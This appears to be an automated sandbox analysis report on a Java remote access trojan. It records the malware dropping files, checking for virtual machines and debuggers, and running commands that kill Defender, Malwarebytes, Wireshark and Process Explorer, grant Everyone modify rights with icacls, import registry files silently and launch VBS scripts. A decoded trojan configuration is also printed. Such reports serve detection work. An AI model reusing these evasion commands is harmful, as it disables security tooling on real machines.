Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-locale-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\keytool.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-process-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\wsdetect.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-time-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jp2native.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\j2pkcs11.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-processenvironment-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\npt.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jfr.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\unpack200.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\dcpr.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-filesystem-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\javafx_iio.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jsdt.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\glib-lite.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\fxplugins.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\WindowsAccessBridge-32.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\instrument.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jsound.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\rmiregistry.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-file-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\JAWTAccessBridge-32.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jp2iexp.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jp2ssv.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\javaws.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-timezone-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\ssv.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\javacpl.cpl	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jsoundds.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-stdio-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\rmid.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-processthreads-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jli.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\nio.dll	Jump to dropped file

Found evasive API chain (may stop execution after checking a module file name)

Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess

Found large amount of non-executed APIs

Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe

API coverage: 1.2 %

Source: javaw.exe, 00000001.00000002.2947521616.0000000004413000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: BDescription=Microsoft Hyper-V Virtualization Infrastructure Driver
Source: javaw.exe, 00000001.00000002.2947521616.0000000004413000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2956709894.0000000009BF4000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2956709894.0000000009BAA000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2947521616.0000000004729000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Description=Microsoft Hyper-V Virtualization Infrastructure Driver
Source: java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMWARE{
Source: java.exe, 00000004.00000002.2948370667.0000000004A45000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: {"NETWORK":[{"PORT":7777,"DNS":"127.0.0.1"}],"INSTALL":false,"MODULE_PATH":"zS/lq/BTk.GI","PLUGIN_FOLDER":"DdWDtpinxpf","JRE_FOLDER":"HSIROD","JAR_FOLDER":"fUTkALeaTxM","JAR_EXTENSION":"Vybgol","ENCRYPT_KEY":"cPFjgddXIBcXBCIseEuXTZjwi","DELAY_INSTALL":2,"NICKNAME":"User","VMWARE":false,"PLUGIN_EXTENSION":"DhjWU","WEBSITE_PROJECT":"https://jrat.io","JAR_NAME":"uiylKSALYJr","JAR_REGISTRY":"WLyQyhWoosi","DELAY_CONNECT":2,"VBOX":false}
Source: java.exe, 00000004.00000003.1751960027.0000000014C6C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: com/sun/corba/se/impl/util/SUNVMCID.classPK
Source: javaw.exe, 00000001.00000002.2947521616.0000000004413000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2956709894.0000000009BF4000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2956709894.0000000009BAA000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2947521616.0000000004729000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: DeviceName=Microsoft Hyper-V Virtualization Infrastructure Driver
Source: java.exe, 00000004.00000003.1751960027.0000000014C6C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: &com/sun/corba/se/impl/util/SUNVMCID.classPK
Source: javaw.exe, 00000001.00000002.2947521616.0000000004413000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Adevicename=microsoft hyper-v virtualization infrastructure driver
Source: xcopy.exe, 00000012.00000003.1809732405.000000000229E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: JVM version %s (%s, %s)VirtualMachineImpl.cRedefineClassesGetTopThreadGroupsJNI_FALSENewStringUTF;classTrack.csignaturessignature bagDeleteWeakGlobalRefclassTrack tableloaded classesAttempting to insert duplicate classKlassNodesignatureNewWeakGlobalRefloaded classes arraycommonRef.cSetTagFreeing %d (%x)
Source: javaw.exe, 00000001.00000002.2942955746.0000000000438000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2944078896.0000000000C9B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [Ljava/lang/VirtualMachineError;
Source: xcopy.exe, 00000012.00000003.1809732405.000000000229E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VirtualMachineImpl.c
Source: java.exe, 00000004.00000003.1751960027.0000000014C6C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: org/omg/CORBA/OMGVMCID.classPK
Source: javaw.exe, 00000001.00000002.2942955746.0000000000438000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2944078896.0000000000C9B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: cjava/lang/VirtualMachineError
Source: javaw.exe, 00000001.00000002.2947521616.00000000043B5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: manufacturer=vmware, inc.
Source: javaw.exe, 00000001.00000002.2947521616.0000000004413000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ADeviceName=Microsoft Hyper-V Virtualization Infrastructure Driver
Source: java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMWARE
Source: javaw.exe, 00000001.00000003.1746488573.000000001466C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000003.1751960027.0000000014C6C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: java/lang/VirtualMachineError.classPK
Source: javaw.exe, 00000001.00000002.2947521616.00000000043B5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Manufacturer=VMware, Inc.
Source: java.exe, 00000004.00000002.2948370667.0000000004981000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: {"NETWORK":[{"PORT":7777,"DNS":"127.0.0.1"}],"INSTALL":false,"MODULE_PATH":"zS/lq/BTk.GI","PLUGIN_FOLDER":"DdWDtpinxpf","JRE_FOLDER":"HSIROD","JAR_FOLDER":"fUTkALeaTxM","JAR_EXTENSION":"Vybgol","ENCRYPT_KEY":"cPFjgddXIBcXBCIseEuXTZjwi","DELAY_INSTALL":2,"NICKNAME":"User","VMWARE":false,"PLUGIN_EXTENSION":"DhjWU","WEBSITE_PROJECT":"https://jrat.io","JAR_NAME":"uiylKSALYJr","JAR_REGISTRY":"WLyQyhWoosi","DELAY_CONNECT":2,"VBOX":false}
Source: javaw.exe, 00000001.00000002.2947521616.0000000004413000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Bdescription=microsoft hyper-v virtualization infrastructure driver
Source: javaw.exe, 00000001.00000002.2942955746.0000000000438000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2944078896.0000000000C9B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe

API call chain: ExitProcess graph end node

Source: C:\Windows\SysWOW64\wbem\WMIC.exe

Process information queried: ProcessInformation

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe

Code function: 1_2_6EEF2C97 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

1_2_6EEF2C97

Contains functionality to dynamically determine API calls

Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe

1_2_6EEF45FB

Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 1_2_6EEF2C97 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		1_2_6EEF2C97
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 1_2_6EEF1244 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		1_2_6EEF1244

Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe

Memory protected: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Excessive usage of taskkill to terminate processes

Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM UserAccountControlSettings.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM ProcessHacker.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM procexp.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MSASCui.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MpUXSrv.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MpCmdRun.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM NisSrv.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM ConfigSecurityPolicy.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM procexp.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM wireshark.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM tshark.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM text2pcap.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM rawshark.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM mergecap.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM editcap.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM ProcessHacker.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM capinfos.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM mbam.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM procexp.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM procexp.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM tshark.exe /T /F	Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe "C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\user\AppData\Roaming\cmukyspiy.txt"	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe "C:\Program Files (x86)\Java\jre-1.8\bin\java.exe" -jar C:\Users\user\AppData\Local\Temp\_0.335919510014015658379257619551515348.class	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive8340316412854535662.vbs	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive6110391193418258336.vbs	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\xcopy.exe xcopy "C:\Program Files (x86)\Java\jre-1.8" "C:\Users\user\AppData\Roaming\Oracle\" /e	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM UserAccountControlSettings.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c regedit.exe /s C:\Users\user\AppData\Local\Temp\XGkhOkmDsC474469576599115670.reg	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM ProcessHacker.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM procexp.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MSASCui.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MpUXSrv.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4143913798509633277.vbs	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MpCmdRun.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM NisSrv.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM ConfigSecurityPolicy.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM procexp.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM wireshark.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM tshark.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM text2pcap.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM rawshark.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM mergecap.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM editcap.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM ProcessHacker.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM capinfos.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM mbam.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM procexp.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4143913798509633277.vbs	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM procexp.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive8340316412854535662.vbs	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
